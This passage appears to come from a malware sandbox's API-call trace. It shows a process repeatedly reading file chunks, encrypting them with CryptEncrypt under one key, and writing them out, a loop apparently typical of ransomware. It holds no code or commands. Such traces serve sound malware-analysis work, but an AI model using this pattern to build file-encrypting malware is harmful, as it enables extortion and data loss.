returned 1 [0280.854] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.854] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.854] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.854] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.854] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.855] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.855] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.855] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.855] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.855] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.855] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.856] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.856] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.856] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.856] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.856] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.857] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.857] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.857] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.857] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.857] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.857] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.857] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.857] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.857] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.858] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.858] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.858] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.858] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.858] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.858] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.859] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.859] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.859] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.859] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.859] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.859] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.859] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.860] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.860] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.860] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.860] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.860] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.860] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.860] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.860] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.860] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.860] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.860] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.860] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.861] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.861] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.861] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.861] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.861] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.861] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.862] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.862] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.862] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.862] ReadFile (in: 